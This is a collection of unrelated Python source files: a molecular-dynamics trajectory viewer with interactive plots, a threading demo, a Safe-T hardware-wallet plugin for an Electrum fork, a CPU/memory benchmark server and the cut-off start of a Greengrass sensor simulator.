wg.HBox([self.widgets.Reset, self.widgets.UI, self.widgets.PlayerStep]),
wg.HBox([wg.VBox([self.widgets.Components,
self.widgets._Component_0,
self.widgets._Component_1]),
wg.VBox([self.widgets.Representation,
self.widgets._Cartoon,
self.widgets._BaS,
self.widgets._Surface,
self.widgets._Visibility]),
wg.VBox([self.widgets.Color,
self.widgets._Color_red,
self.widgets._Color_orange,
self.widgets._Color_yellow,
self.widgets._Color_green,
self.widgets._Color_cyan,
self.widgets._Color_blue,
self.widgets._Color_purple,
self.widgets._Color_magenta]),
wg.VBox([self.widgets.Color_by_RES,
self.widgets._Color_black,
self.widgets._Color_grey_80,
self.widgets._Color_grey_60,
self.widgets._Color_grey_40,
self.widgets._Color_grey_20,
self.widgets._Color_white,
self.widgets._Color_baw,
self.widgets._Color_rainbow])
])
])
else:
tv_and_widgets = wg.VBox([self.player,
wg.HBox([self.widgets.FrameTime, self.widgets.YValue, self.widgets.Reset, self.widgets.UI, self.widgets.PlayerStep]),
wg.HBox([wg.VBox([self.widgets.Components,
self.widgets._Component_0,
self.widgets._Component_1]),
wg.VBox([self.widgets.Representation,
self.widgets._Cartoon,
self.widgets._BaS,
self.widgets._Surface,
self.widgets._Visibility]),
wg.VBox([self.widgets.Color,
self.widgets._Color_red,
self.widgets._Color_orange,
self.widgets._Color_yellow,
self.widgets._Color_green,
self.widgets._Color_cyan,
self.widgets._Color_blue,
self.widgets._Color_purple,
self.widgets._Color_magenta]),
wg.VBox([self.widgets.Color_by_RES,
self.widgets._Color_black,
self.widgets._Color_grey_80,
self.widgets._Color_grey_60,
self.widgets._Color_grey_40,
self.widgets._Color_grey_20,
self.widgets._Color_white,
self.widgets._Color_baw,
self.widgets._Color_rainbow])
])
])
self._update_player_layout(layout)
display(tv_and_widgets)
t = threading.Thread(target=self._save_camera_orientation)
t.start()
return
class iPlot(iPlayer):
def __init__(self, universe=None, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5), layout='default'):
"""
Init iPlot.
"""
super().__init__(universe)
self.widgets.toggle_UI(False)
self.xdata = np.array(xdata)
self.ydata = np.array(ydata)
# figure properties
self.fig = lambda: None # create function object
self.fig.xlabel = xlabel
self.fig.ylabel = ylabel
self.fig.title = title
self.fig.tu = tu
self.fig.figsize = figsize
# Marie stuff start (interactive widgets)
self._update_player_layout(layout)
def update_YValue_description(args):
"""
Update <iPlayer_object>.widgets.YValue.description
"""
frame = args['new']
# if len(ydata) == len(frames)
if frame < len(self.ydata):
yvalue = self.ydata[frame]
else:
yvalue = self.ydata[-1]
self.widgets.YValue.description = '{}: {}'.format(self.fig.ylabel.split(" ")[0], round(yvalue, 5))
self.player.observe(update_YValue_description, 'frame')
def find_Min(a):
"""
Find and jump to global minimum in xy-Plot
"""
Xmin = self.xdata[np.argmin(self.ydata)]
self.player.frame = int(round(Xmin/self.universe.trajectory.dt))
self.widgets.YValue.on_click(find_Min)
# Marie stuff end (interactive widgets)
return
def __call__(self, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5), layout='default'):
"""
Show trajectory viewer with GUI and interactive matplotlib plot.
Interactive red bar can be moved by pressing any key.
Args:
xdata (array)
ydata (array)
xlabel (str)
ylabel (str)
title (str)
tu (str):
| time unit of plot. Either 'ps', 'ns' or 'frame'.
| If 'ns' is selected, time stamps of MDAnalysis universe are converted from ps to ns.
| Important to make the interactive red bar work properly.
figsize (tuple)
layout (str):
| 'default': default layout
| 'every other str': non-default layout
.. Note:: Alternatively execute show_plot() method by calling the object.
Example:
| ip = core.iPlot(<universe>)
| ip() # short version of ip.show_plot()
"""
# special case: make the call Q('kw-layout') work as Q(layout='kw-layout')
if type(xdata) is str:
layout = xdata
self._update_player_layout(layout)
self._update_fig_properties(xlabel, ylabel, title, tu, figsize)
self.show_player(layout)
if xdata is not None and ydata is not None:
self.show_plot(xdata, ydata, self.fig.xlabel, self.fig.ylabel, self.fig.title, self.fig.tu, self.fig.figsize)
else:
self.show_plot(self.xdata, self.ydata, self.fig.xlabel, self.fig.ylabel, self.fig.title, self.fig.tu, self.fig.figsize)
return
def __repr__(self):
return('''iPlot object:\n {}\n <Trajectory with {} frames>\n <{}>\n <{} data points>'''.format(
self.universe, len(self.universe.trajectory), self.player, len(self.xdata)))
def _update_fig_properties(self, xlabel='X', ylabel='Y', title='', tu='ps', figsize=(8, 4.5), smartlabel=True):
"""
update fig properties
"""
default = {'xlabel': 'X',
'ylabel': 'Y',
'title': '',
'tu': 'ps',
'figsize': (8, 4.5)}
if xlabel != default['xlabel']:
self.fig.xlabel = xlabel
if ylabel != default['ylabel']:
self.fig.ylabel = ylabel
if title != default['title']:
self.fig.title = title
if tu != default['tu']:
self.fig.tu = tu
if figsize != default['figsize']:
self.fig.figsize = figsize
# extra: smartlabel (change tu and label)
if smartlabel == True and self.fig.xlabel == default['xlabel']:
if self.fig.tu == 'frame':
self.fig.xlabel = 'Frame'
elif self.fig.tu == 'ps':
self.fig.xlabel = 'Time (ps)'
elif self.fig.tu == 'ns':
self.fig.xlabel = 'Time (ns)'
if smartlabel == True and 'frame' in self.fig.xlabel.lower():
self.fig.tu = 'frame'
if smartlabel == True and self.fig.ylabel == default['ylabel']:
self.fig.ylabel = 'RMSD'
return
def show_plot(self, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5)):
"""
Show trajectory viewer with GUI and interactive matplotlib plot.
Interactive red bar can be moved by pressing any key.
Args:
xdata (array)
ydata (array)
xlabel (str)
ylabel (str)
title (str)
tu (str):
| time unit of plot. Either 'ps', 'ns' or 'frame'.
| If 'ns' is selected, time stamps of MDAnalysis universe are converted from ps to ns.
| Important to make the interactive red bar work properly.
figsize (tuple)
.. Note:: Alternatively execute show_plot() method by calling the object.
Example:
| ip = core.iPlot(<universe>)
| ip() # short version of ip.show_plot()
"""
self._update_player_layout(self.player._layout)
self._update_fig_properties(xlabel, ylabel, title, tu, figsize)
# assign values
if xdata is not None and ydata is not None:
self.xdata = np.array(xdata)
self.ydata = np.array(ydata)
# assign pseudo values for testing (if no values assigned yet)
if self.xdata.ndim == 0 and self.ydata.ndim == 0:
print("No data specified. Using pseudo values for figure.\
\nJump to a frame/move the interactive red bar by holding any key and pressing LMB.")
if self.fig.tu == 'frame':
self.xdata = np.linspace(self.universe.trajectory[0].frame,
self.universe.trajectory[-1].frame,
100)
else:
self.xdata = np.linspace(self.universe.trajectory[0].time,
self.universe.trajectory[-1].time,
100)
self.ydata = np.random.uniform(low=0.0, high=5.0, size=(100,))
# plot
self.fig.fig = plt.figure(figsize=figsize)
self.ax = self.fig.fig.add_subplot(111)
if self.fig.tu == 'ps':
# self.ax.plot(self.xdata, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self.xdata, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self.xdata, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self.xdata[0], color="red", lw=2) # redline
plt.xlim(self.xdata[0], self.xdata[-1])
except (TypeError, IndexError):
pass
if self.fig.tu == 'ns':
self._xdata_ns = 0.001 * self.xdata
# self.ax.plot(self._xdata_ns, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self._xdata_ns, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self._xdata_ns, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self._xdata_ns[0], color="red", lw=2) # redline
plt.xlim(self._xdata_ns[0], self._xdata_ns[-1])
except (TypeError, IndexError):
pass
if self.fig.tu == 'frame':
self._xdata_frame = np.arange(0, len(self.xdata))
# self.ax.plot(self._xdata_frame, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self._xdata_frame, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self._xdata_frame, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self._xdata_frame[0], color="red", lw=2) # redline
plt.xlim(self._xdata_frame[0], self._xdata_frame[-1])
except (TypeError, IndexError):
pass
plt.xlabel(self.fig.xlabel)
plt.ylabel(self.fig.ylabel)
if self.fig.title != '':
plt.title(self.fig.title, fontweight="bold")
plt.ylim(0,)
sns.despine(offset=0)
plt.tight_layout()
# make fig interactive
self._event = lambda: None
self._event.key_is_held = False
def hold_key(event):
self._event.key_is_held = True
return
self.fig.fig.canvas.mpl_connect('key_press_event', hold_key)
def release_key(event):
self._event.key_is_held = False
return
self.fig.fig.canvas.mpl_connect('key_release_event', release_key)
def onclick_goto_FRAME(event):
"""
Click behavior for tu='frame'.
"""
if self._event.key_is_held and self.fig.tu == 'frame':
self.player.frame = int(round(event.xdata))
return
self.fig.fig.canvas.mpl_connect('button_press_event', onclick_goto_FRAME)
def onclick_goto_TIME(event):
"""
Click behavior for tu='ps' and tu='ns'.
"""
if self._event.key_is_held and self.fig.tu == 'ps':
self.player.frame = int(round(event.xdata / self.universe.trajectory.dt))
elif self._event.key_is_held and self.fig.tu == 'ns':
self.player.frame = int(round(1000 * event.xdata / self.universe.trajectory.dt))
return
self.fig.fig.canvas.mpl_connect('button_press_event', onclick_goto_TIME)
def draw_redbar(args):
"""
Draw red bar in interactive matplotlib based on current frame/time of trajectory viewer.
"""
frame = args['new']
del self.ax.lines[-1]
if self.fig.tu == 'frame':
self.ax.axvline(x=frame, color="red", lw=2)
elif self.fig.tu == 'ps':
time = frame * self.universe.trajectory.dt
self.ax.axvline(x=time, color="red", lw=2)
elif self.fig.tu == 'ns':
time = 0.001 * frame * self.universe.trajectory.dt
self.ax.axvline(x=time, color="red", lw=2)
return
self.player.observe(draw_redbar, 'frame')
return
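# Editor's usage sketch (not part of the original module; "<pdb_file>" is a
# placeholder): applying a color scheme programmatically instead of via the
# widget buttons.
def _example_color_scheme():
    tv = iPlayer(mda.Universe("<pdb_file>"))
    tv()  # show trajectory viewer with GUI
    tv.color.set_color_scheme('baw')  # black-and-white scheme for component 0
    return tv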
|
misc1.py
|
from threading import Thread
lx = 0
def function():
while True:
global lx # We are referring to the globally assigned variable.
lx+=1
#return lx
def function1():
while True:
global lx # We are referring to the globally assigned variable.
print(lx)
Thread(target=function).start()
Thread(target=function1).start()
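# Editor's sketch (not part of the original file): the two threads above mutate
# and read the shared global without synchronization. A Lock-guarded variant of
# the same pattern (defined here but not started) looks like this:
from threading import Lock
_lx_lock = Lock()
def safe_increment():
    global lx
    while True:
        with _lx_lock:
            lx += 1
def safe_print():
    while True:
        with _lx_lock:
            print(lx)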
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_vtc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_vtc.bip32 import BIP32Node
from electrum_vtc import constants
from electrum_vtc.i18n import _
from electrum_vtc.plugin import Device, runs_in_hwd_thread
from electrum_vtc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_vtc.keystore import Hardware_KeyStore
from electrum_vtc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
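# Note: the two mapping helpers above mirror each other. Native segwit ('p2wpkh'/'p2wsh') maps to
# the *WITNESS variants, wrapped segwit ('p2wpkh-p2sh'/'p2wsh-p2sh') to the *P2SHWITNESS variants,
# legacy 'p2pkh' to *ADDRESS and 'p2sh' to *MULTISIG, for InputScriptType and OutputScriptType
# respectively.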
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
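# Illustrative sketch only (the xpubs and derivation suffixes below are hypothetical): a 2-of-3
# multisig would be described to the device as
#   multisig = self._make_multisig(2, [(xpub_a, (0, 7)), (xpub_b, (0, 7)), (xpub_c, (0, 7))])
# which yields a MultisigRedeemScriptType with three HDNodePathType pubkeys, signatures=[b''] * 3
# and m=2; a single-entry list returns None because no multisig script is needed.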
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main.py
|
#!/usr/bin/env python3
from timeit import Timer
import multiprocessing
import math
import time
import cherrypy
import os
from datetime import datetime
from pythonping import ping
import requests
try:
logFilePath = os.environ["LOGFILE"]
logFile = open(logFilePath, "a", 1)
print("Writing logs to " + logFilePath)
except KeyError as e:
print("Logging to file is disabled, to enable provide a LOGFILE environment variable")
except Exception as e:
print(repr(e))
def log(text):
now = datetime.now()
toLog = now.strftime("%H:%M:%S - ") + text
if "LOGFILE" in os.environ:
logFile.write(toLog + "\n")
print(toLog)
def fibonacci(n):
a = 0
b = 1
r = -1
if n < 0:
log("Incorrect input")
return
elif n == 0:
r = a
elif n == 1:
r = b
else:
# iterate up to and including n so that r ends up as the n-th Fibonacci number
for i in range(2, n + 1):
c = a + b
a = b
b = c
r = b
# log("Fibonacci number {0!s} is {1!s}".format(n, r))
return r
def parallelized_fibonacci_benchmark(i, runs_per_core, measurements):
t = Timer(lambda: fibonacci(10000))
measurements[i] = t.repeat(number=runs_per_core, repeat=3)
def send_benchmark_completed_message(event_name):
if "EVENT_ENDPOINT" in os.environ:
url = os.environ["EVENT_ENDPOINT"] + "?event_name=" + event_name
log("Sending benchmark completed message to " + url)
x = requests.get(url)
log("Status code was " + str(x.status_code))
class Server(object):
@cherrypy.expose
def run(self, max_memory=10):
single_run(int(max_memory))
return("Run completed, results are written to console.")
@cherrypy.expose
def prepare(self, max_memory=10):
self.prepared_mem = int(max_memory)
log("Prepared run, max_memory is " + str(max_memory))
return("Prepared")
@cherrypy.expose
def state(self, state_name="[was not provided by server]"):
log("#############################")
log("#############################")
log("Now in state " + state_name)
log("#############################")
log("#############################")
p = multiprocessing.Process(target=single_run, args=(self.prepared_mem,))
p.start()
return("Ok")
def single_run(max_memory):
start_printing = max(max_memory - 100, int(max_memory / 2))
log("Starting CPU benchmark")
manager = multiprocessing.Manager()
measurements = manager.dict()
processes = []
cores = multiprocessing.cpu_count()
for i in range(0,cores):
runs_per_core = int(2000 / cores)
p = multiprocessing.Process(target=parallelized_fibonacci_benchmark, args=(i,runs_per_core,measurements))
processes.append(p)
p.start()
for process in processes:
process.join()
# determine total results for all operations
results = [0.0, 0.0, 0.0]
for m in measurements.values():
results[0] = results[0] + m[0]
results[1] = results[1] + m[1]
results[2] = results[2] + m[2]
mean = sum(results) / len(results)
var = sum(pow(x-mean,2) for x in results) / len(results)
std = math.sqrt(var) # standard deviation
log("CPU-Time needed for CPU benchmark: {0!s}s (SD={1!s}s)".format(mean, std))
send_benchmark_completed_message("cpu")
log("Trying to allocate up to {1!s}mb of memory, printing allocated amount starting at {0!s}mb:".format(start_printing, max_memory))
longstring = []
for x in range(1, max_memory + 1):
longstring.append("1" * 10**6)
if (x >= start_printing):
log("{0!s}mb".format(len(longstring)))
longstring = []
log("\nWas able to allocate all needed memory")
send_benchmark_completed_message("memory")
def ping_helper(targetAddress):
while True:
log("Ping to {0!s} is {1!s}ms".format(targetAddress, ping(targetAddress, count=1).rtt_avg_ms))
time.sleep(2)
def webserver_helper():
conf = {
"global": {
"server.socket_port": int(os.environ["PORT"]),
"server.socket_host": "0.0.0.0"
}
}
cherrypy.quickstart(Server(), "/", conf)
if __name__ == "__main__":
if "PING" in os.environ:
log("Starting to ping " + os.environ["PING"])
pingP = multiprocessing.Process(target=ping_helper, args=(os.environ["PING"],))
pingP.start()
else:
log("Pinging is disabled, to enable provide a PING environment variable that contains the target address")
if "PORT" in os.environ:
log("Starting CRExplorer webserver at port {0!s}, a request could look like http://localhost:{0!s}/run?max_memory=30".format(os.environ["PORT"]))
serverP = multiprocessing.Process(target=webserver_helper)
serverP.start()
input("Press a key to exit")
os._exit(0)
else:
# parse input
memory_s = input("How much megabyte of memory should we allocate? Enter a number: ")
max_memory = int(memory_s)
single_run(max_memory)
os._exit(0)
|
sensor_source.py
|
# Greengrass lambda source -sensor source
import json
import logging
from threading import Thread, Lock
from time import sleep, time
from random import gauss
import greengrasssdk
import flask
from flask import request, jsonify
# Configure logger
logger = logging.getLogger()
logger.setLevel(logging.WARN)
client = greengrasssdk.client("iot-data")
lock = Lock()
generate_sensor_data = True
app = flask.Flask(__name__)
@app.route("/api/v1/sensor/data/enable", methods=["GET"])
def api_sensor_data_enable():
"""Enable generation of sensor data"""
global generate_sensor_data
lock.acquire()
generate_sensor_data = True
lock.release()
return jsonify({"response": "sensor data enabled"})
@app.route("/api/v1/sensor/data/disable", methods=["GET"])
def api_sensor_data_disable():
"""Disables generation of sensor data"""
global generate_sensor_data
lock.acquire()
generate_sensor_data = False
lock.release()
return jsonify({"response": "sensor data disabled"})
@app.route("/api/v1/sensor/data/status", methods=["GET"])
def api_sensor_data_status():
"""Returns current status of sensor data generation"""
global generate_sensor_data
lock.acquire()
status = generate_sensor_data
lock.release()
return jsonify({"response": f"sensor data generation is set to {status}"})
def simulated_data():
"""Randomly generate data and timestamp"""
hertz = float("%.2f" % (gauss(1000, 2)))
temperature = float("%.2f" % (gauss(80, 4)))
timestamp = float("%.4f" % (time()))
return {"hertz": hertz, "temperature": temperature, "timestamp": timestamp}
def api_server():
"""Run and process API requests as separate thread"""
Thread(
